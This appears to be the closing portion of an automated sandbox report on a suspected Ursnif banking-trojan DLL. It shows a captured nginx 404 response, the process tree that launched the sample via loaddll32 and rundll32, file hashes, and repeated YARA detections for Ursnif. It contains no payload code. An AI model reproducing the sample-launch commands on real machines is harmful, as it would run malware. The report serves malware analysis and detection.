67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->



                        Target ID:0
                        Start time:17:03:03
                        Start date:26/01/2022
                        Path:C:\Windows\System32\loaddll32.exe
                        Wow64 process (32bit):true
                        Commandline:loaddll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll"
                        Imagebase:0x8b0000
                        File size:116736 bytes
                        MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Yara matches:
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.777601117.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.481994883.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.302599061.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.302425761.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.302331542.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.776718826.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.302218181.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.302044791.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.776603802.0000000000890000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.776641923.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.301848056.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.302504649.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.301661083.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.777721996.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high

                        Target ID:1
                        Start time:17:03:04
                        Start date:26/01/2022
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
                        Imagebase:0x150000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:3
                        Start time:17:03:04
                        Start date:26/01/2022
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
                        Imagebase:0x1360000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Yara matches:
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000000.253570198.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000000.254119232.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000000.253543214.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000000.254127070.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000000.254160040.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.315717603.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high

                        Target ID:7
                        Start time:17:03:07
                        Start date:26/01/2022
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 684
                        Imagebase:0x930000
                        File size:434592 bytes
                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        No disassembly